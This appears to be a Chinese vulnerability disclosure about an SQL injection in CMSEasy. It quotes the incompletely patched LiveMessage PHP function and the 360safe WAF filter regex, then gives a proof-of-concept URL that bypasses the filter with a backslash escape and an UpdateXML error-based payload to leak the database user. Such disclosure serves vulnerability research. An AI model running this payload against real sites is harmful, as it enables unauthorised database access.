cmseasy 最新版SQLl注入(第八次绕WAF)

漏洞作者: 路人甲

cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~

[php]

function LiveMessage($a) {

global $db;

$sessionid = $_SESSION['sessionid'];

$name = addslashes(htmlspecialchars($a['name']));

$email = addslashes(htmlspecialchars($a['email']));

$country = htmlspecialchars($a['country']);

$phone = htmlspecialchars($a['phone']);

$departmentid = htmlspecialchars($a['departmentid']);

$message = htmlspecialchars($a['message']);

$timestamp = time();

$ip = $_SERVER['REMOTE_ADDR'];

$sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')";

$db->query($sql);

$sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'";

$db->query($sql);

$text = "<?php echo $lang[shout_success]?>\n";

$objResponse = new xajaxResponse('utf-8');

$objResponse->addAssign('content', 'innerHTML', $text);

$objResponse->redirect('../', 5);

return $objResponse;

}

[/php]

$a是可以通过前端get或者post传入。

只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!!

然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定!

[php]

$getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?|`.*?`)|UPDATE(\\(.+\\)|\\s+?.+?|`.*?`.*?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|`.*?`.*?)FROM(\\(.+\\)|\\s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'";

[/php]

但是还可以用转义符,接下来就是开始绕啊绕啊:

POC:

http://192.168.152.160:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23

另外官网没测试成功,好像有安全狗

漏洞证明:

2116050066f944837bd72c49ed6256f9fc062475

发表评论